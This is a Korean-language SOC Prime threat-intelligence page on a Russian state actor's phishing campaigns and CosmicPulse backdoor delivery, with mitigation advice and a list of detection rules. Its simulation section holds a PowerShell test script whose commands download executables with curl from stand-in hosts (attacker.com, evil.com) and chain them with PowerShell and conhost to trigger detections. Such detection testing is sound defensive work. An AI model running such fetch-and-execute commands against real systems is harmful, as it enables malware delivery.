SOC Prime Bias: Critical

01 Oct 2026 08:18 UTC

스타 블리자드, RedFlick을 활용한 피싱 및 멀웨어 전개 강화

Author Photo
SOC Prime Team linkedin icon 팔로우
스타 블리자드, RedFlick을 활용한 피싱 및 멀웨어 전개 강화
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

요약

러시아 국가 지원 행위자 Star Blizzard는 CosmicPulse 백도어를 전달하기 위해 RedFlick 기술을 사용하여 자신의 기술을 발전시켰습니다. 이 행위자는 고도로 표적화된 스피어 피싱에서 손상된 웹사이트를 이용한 대규모 자동화 피싱 캠페인으로 전환했습니다. 이러한 캠페인은 VHDX 파일 및 PDF 파일에 숨겨진 페이로드를 포함한 정교한 전달 방법을 사용하여 탐지를 회피합니다.

조사

Microsoft Threat Intelligence는 2026년 동안 관찰된 다양한 피싱 물결을 분석하고, ClickFix 기반 체인에서 RedFlick 예약 작업으로의 전환을 식별했습니다. 조사에는 LNK 파일, SSH 로컬 명령 실행, WebDAV를 사용한 원격 페이로드 검색을 포함한 다단계 실행 흐름이 자세히 설명되었습니다. 기술 분석은 CosmicPulse 페이로드에 대한 스테가노그래피 및 레지스트리 기반 암호화 사용도 밝혀냈습니다.

완화

조직은 신원 보호를 위해 피싱 저항 인증 및 조건부 액세스 정책을 구현해야 합니다. 엔드포인트 보호는 EDR을 차단 모드로 설정하고 실시간 안티바이러스 보호를 활성화해야 합니다. 또한 공격 표면 축소 규칙을 구현하여 난독화된 스크립트 및 허가되지 않은 실행 파일의 실행을 방지할 수 있습니다.

대응

탐지 시, 보안 팀은 EDR을 사용하여 악성 아티팩트를 복구하고 의심스러운 로그인 시도를 조사해야 합니다. 응답 시간을 단축하기 위해 자동 조사 및 복구 모드를 활성화해야 합니다. 조직은 또한 고급 피싱 방지 솔루션과 Zero-hour 자동 삭제를 사용하여 들어오는 악성 통신을 무력화해야 합니다.

공격 흐름

이 부분을 계속 업데이트하고 있습니다.

탐지

의심스러운 명령줄에는 실행 파일을 인수로 포함한 UNC 경로가 포함됩니다 (cmdline을 통해)

SOC Prime 팀
2026년 9월 30일

가능한 네트워크 공유 탐색 (cmdline을 통해)

SOC Prime 팀
2026년 9월 30일

의심스러운 MsiExec 원격 설치 프로그램 숨김 설치 시도 (cmdline을 통해)

SOC Prime 팀
2026년 9월 30일

LOLBAS Conhost (cmdline을 통해)

SOC Prime 팀
2026년 9월 30일

가능한 터널링 도구 사용 [Windows] (cmdline을 통해)

SOC Prime 팀
2026년 9월 30일

의심스러운 CURL 사용 (cmdline을 통해)

SOC Prime 팀
2026년 9월 30일

비정상적인 최상위 도메인 (TLD) DNS 요청에 의한 의심스러운 명령 및 제어 (dns를 통해)

SOC Prime 팀
2026년 9월 30일

탐지를 위한 IOCs (HashSha256): Star Blizzard는 RedFlick 기술을 사용하여 피싱 및 악성 소프트웨어 전송을 정제합니다

SOC Prime AI 규칙
2026년 9월 30일

탐지를 위한 IOCs (SourceIP): Star Blizzard는 RedFlick 기술을 사용하여 피싱 및 악성 소프트웨어 전송을 정제합니다

SOC Prime AI 규칙
2026년 9월 30일

탐지를 위한 IOCs (DestinationIP): Star Blizzard는 RedFlick 기술을 사용하여 피싱 및 악성 소프트웨어 전송을 정제합니다

SOC Prime AI 규칙
2026년 9월 30일

PDF 다운로드에서 PowerShell 실행 탐지 [Windows Powershell]

SOC Prime AI 규칙
2026년 9월 30일

Star Blizzard RedFlick 기술 탐지 – 예약 작업 및 명령줄 실행 [Windows 프로세스 생성]

SOC Prime AI 규칙
2026년 9월 30일

시뮬레이션 실행

  • 공격 내러티브 및 명령: 적은 악성 파일에 대한 링크를 포함한 피싱 이메일을 전달합니다. 상호 작용 시, curl 이차 단계를 가져오는 데 사용됩니다. 시스템 프로세스와 혼합하기 위해 명령은 명시적으로 포함되도록 설계되었습니다. PowerShell, PDF (트리거의 출처 참조), 및 conhost.exe 명령 줄 문자열에 포함하여 대상 탐지 규칙의 논리에 맞추고자 합니다. 목표는 PDF 구조 내에 내장된 디코딩된 페이로드를 실행하는 것입니다.

  • 회귀 테스트 스크립트:

    # '다운로드 PDF에서 PowerShell 실행 탐지' 규칙을 트리거하는 시뮬레이션 스크립트.
    # 이 스크립트는 네 가지 필수 키워드를 포함한 명령줄 문자열을 구성합니다.
    
    $fakePdfPath = "C:UsersPublicDocumentsinvoice_decoy.PDF"
    $cmd = "cmd.exe /c curl -o payload.exe http://attacker.com/shell.exe && PowerShell.exe -Command `& {Write-Host 'PDF에서 추출 중...'; Start-Process conhost.exe}"
    
    # conhost.exe가 프로세스 트리/명령 컨텍스트의 일부가 되도록 cmd를 통해 실행합니다
    Start-Process cmd.exe -ArgumentList "/c curl -o data.bin http://evil.com/ & PowerShell -Command `"Extracting from PDF... using conhost.exe`""
  • 정리 명령어:

    # 시뮬레이션 중 생성된 파일 정리
    Remove-Item -Path "C:UsersPublicDocumentsinvoice_decoy.PDF" -ErrorAction SilentlyContinue
    Remove-Item -Path "data.bin" -ErrorAction SilentlyContinue
    Remove-Item -Path "payload.exe" -ErrorAction SilentlyContinue